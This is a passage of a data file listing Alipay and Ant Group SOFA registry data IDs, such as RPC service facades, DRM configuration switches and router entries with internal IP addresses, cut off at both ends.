#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanDecisionSwitchDrm.orgGrayCutFlowStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.offer.OfferCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.poscore.common.service.facade.creditcardfp.CardInfoManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.190.152#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.riskmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.common.service.facade.life.LifeOrderLinkServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:lyra-playground@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.question.AnswerGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.CampTagConfigInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.marketing.LifeMiniAppServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PaycoreCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.v2.api.internal.AgmTemplateDeployFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.kit.cache.facade.ArCacheCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaota.common.service.facade.ota.IotOtaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopenmng.service.facade.InterfaceInstanceMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.VenueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_SCHENOTIFY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.common.service.integration.prodtrans.ProdtransQueryExtFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IExpenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.access.AuthRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appstore.common.service.facade.promotion.PromotionOrderRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmepbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apmobileprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffund.common.service.facade.api.gfpayment.PaymentAcceptOrderOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.distribution.channel.api.DistributionChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarguard.facade.JarInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.CainiaoContractSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.170.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudbox.facade.apibus.service.common.OperationTaskExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_K_MERCHANT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.RejectWhenBuyerUnusableResource.state,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.215.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorprod.common.service.facade.api.SelectUserUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.dcommservice.common.service.facade.v2.api.UserBizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.recNeptuneRecConfigSceneId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isdsp.common.service.facade.DsDimTableServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.forest.UploadForestPicService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.activityProduct4NotAudit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MINDV#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.repository.AssetClaimApplyRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.coupon.open.CouponOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.starstage.facade.MenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.riskbiz.common.service.facade.api.CommonRiskDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_JOINTCARD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finmodelops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipayment.service.facade.api.async.AsyncPaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.darwin:name=com.alipay.darwin.sdk.config.afs.endpoint,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unitestcenter.common.service.facade.api.InspectionScenarioInitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.TradeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockRedPointDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.UserGoldPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.ThemeModuleDrmResource.maxAlgoShortNameLength,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydatalib.common.facade.service.SecurityDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.online.service.common.service.MyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.spi.TdatTaskDetailFacade:1.0:QNS@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.common.service.facade.management.KatongCardQueryService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:govbizcenter_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BKCREDITMSGPLATFORM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bksmartdetect-parent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cfpcenter.common.service.facade.api.writeoff.CfpWriteOffVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ProductConfMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.config.api.MemoryConfigFacade:1.0:opscloudcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.product.PscPdConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.check.BotDeployBlockPointTaskCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkpromocore.common.service.facade.MyBankUserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.merchant.MerchantRebateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finadvisorprod:name=com.alipay.finadvisorprod.configDrm.openExclusive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeexprod.facade.PucChargeInstViewConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_dictionary_dictionaryCoreFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.itemPromoParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:dwalm@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_F_FORUM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:scardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgmng.common.service.facade.schema.SchemaImportAndExportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chargefront:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfsettleprod.facade.InvoiceOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.serverGrayStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:antsecurity_securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.MarketingPlanListManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.facade.prepaid.PromotionPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agmcenter.common.service.facade.api.AgmSalePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.util.drm.PsGrayDrm.openQueryServiceReturnNew,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.service.facade.PsOrganizationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqdataservice.common.service.facade.po.PoAlarmDataOutputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.PatchValidateDrmResourceTrigger.supportInstsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.drc.rm.endpoint.facade.FaviconRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.core.refund.TradecoreRefundService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.highvalue.api.HvtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ADDP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-stocksupervise-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:faudiorec@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isSyncStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scsupport.common.service.facade.stocktools.InstConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:chaos_undifferentiated@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.FinancingAuditManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.WarnResultMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-C-securitycenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbsales@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","finscprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.baoxianprod.tripcoupon.facade.CommonTripCouponFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:benefitControlBizFacadeNew@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.slsLogStoreConsumeQps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.254.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ismonitor.common.service.facade.aim.ExplorerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.CloseAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.endpoint.openapi.ActivityInstanceOpenApi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chaos.dig.facade.midaccount.MidAccountWeaknessFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.253.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.contemporaryRiskRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yeb.YebSingleIncomeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillAccountTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.query.CfpBizDigestQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.changecode.ChangeCodeInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.relationship.MrchGroupSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.biz.tisout.spirit.ElfClueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.CampaignTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.extension.service.facade.api.Double12PlanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:codecProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.ScenePromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pledgecore.common.service.facade.spi.PledgeAssetConsultService:1.0:aeicorePledgeAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchaincustomer.facade.api.authlogin.AuthLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:msgopprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_inscvprod_schedule_task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.sitecenter:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.CommonConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zpaascore.servcie.facade.PaasCoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.couponDeduction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue37#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:ofpgrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeDRMConfigureImpl.buffChargePriority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:done@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.metadata.service.MetadataSchemeService:1.0:metadataSchemeService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bugscan.service.BugscanBlackListEventCallBack:1.0:BIZ_NAME_OPEN_PLAT@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.tag.ActivityTagManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingUniformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:oatpexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ComputeClusterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.metadata.facade.QueryServiceMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.DowngradeSwitchConfig.skipRegulation2Str,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobile.mdevsupport.facade.task.api.TaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_STMTCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpublishuiweb:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.common.service.facade.dislike.api.DislikeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettleTaskExecuteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.usePaymentRefund,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqualitywalleetoe.common.service.facade.api.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.CreativeDeliverFacadeV2:1.0:ucdpcore-mrch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.metadata.conf.cache.LoadCacheSwitch.loadCaheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.consumeprod.common.service.facade.DataMockEbillAnnualService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.QueryConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.finpwm.finpwmXTradeDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@promocenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_CONTROL_POD_TRAFFIC_WORKFLOW@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsupport.component.checker.spi.FluxCheckerQueryService:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.insmobile.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdevops_BreaknetApplyProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.242.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pcardsales:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fporgassetkeeper.facade.api.CommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkloancommon.common.service.facade.custrealm.api.CustInstInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchprodIndirectMerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_PRE_AUTH_PROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:imerchopmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.register.InviteRegisterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.autoscaling.AutoScalingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@hainaprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mdeduct.common.service.facade.CaeMerchantService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.syncAppMinVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inspectprod.biz.service.schudeler.HistoryDataCleanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.239.236.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:girisk_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmobileappcommon_homePage_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.DataProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcreditbfweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.doc.TagFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.overseaexprod.comon.service.facade.rate.RatePromoUseCountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.newsInfluenceThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.222.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.common.service.facade.label.LabelConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcidentifycore_manualCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdataaccess.common.service.facade.api.rate.OrderAcceptFacade:1.0@DEFAULT#@#DEFA